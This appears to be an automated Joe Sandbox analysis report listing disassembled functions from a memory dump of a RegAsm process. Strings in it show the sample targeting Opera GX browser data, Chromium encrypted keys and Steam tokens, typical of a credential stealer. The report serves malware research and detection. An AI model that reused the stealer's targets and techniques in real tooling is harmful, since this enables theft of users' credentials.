                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1664310425-0
                                                                                                                                                        • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                        • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                                                        • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                        • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                                                        Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                          • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                        • String ID: Opera GX
                                                                                                                                                        • API String ID: 1719890681-3280151751
                                                                                                                                                        • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                        • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                                                        • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                        • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                                                        Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-3916222277
                                                                                                                                                        • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                        • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                                                        • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                        • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                        Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                        • API String ID: 502913869-3507145866
                                                                                                                                                        • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                        • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                                                        • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                        • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                                                        Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                        • String ID: 1iA
                                                                                                                                                        • API String ID: 3494564517-1863120733
                                                                                                                                                        • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                        • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                                                        • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                        • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                                                        Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                        • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                                                        • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                        • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                                                        Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.MSVCRT ref: 0041CBC9
                                                                                                                                                          • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                                                          • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                                                          • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                                                        • malloc.MSVCRT ref: 0041CC06
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$lstrcpylstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2974738957-0
                                                                                                                                                        • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                        • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                                                        • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                        • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                                                        Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                        • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                                                                        • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                        • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                                                        Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                        • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                                                        • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                        • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                                                        Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                        • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                        • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                                                        • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                        • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                                                        Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
